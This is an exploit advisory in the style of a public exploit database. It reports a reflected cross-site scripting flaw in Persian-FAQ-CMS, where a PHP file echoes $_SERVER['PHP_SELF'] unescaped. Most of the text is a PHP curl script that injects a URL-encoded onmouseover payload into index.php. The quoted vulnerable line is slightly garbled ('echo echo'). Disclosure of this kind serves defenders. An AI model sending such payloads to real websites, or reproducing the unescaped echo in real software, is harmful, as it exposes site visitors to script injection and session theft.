=====================================================
# Exploit Title: Persian-FAQ-CMS Cross-Site Scripting
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.dl.persianscript.ir/script/Persian-FAQ-CMS.zip
# Tested on: Windows 8, Kali Linux
# Date : 26 OCT 2016
=====================================================
# Vulnerable file(url) and code:
// Mehod : Post
// http://127.0.0.1/index.php
Line 3: $loginFormAction = $_SERVER['PHP_SELF'];
/******************************************/
Line 70: echo echo $loginFormAction;
/*****************************************/
# Exploit code:
<?php
$target = "127.0.0.1/path";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/index.php/%22onmouseover%3d'alert(123)'bad%3d%22");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================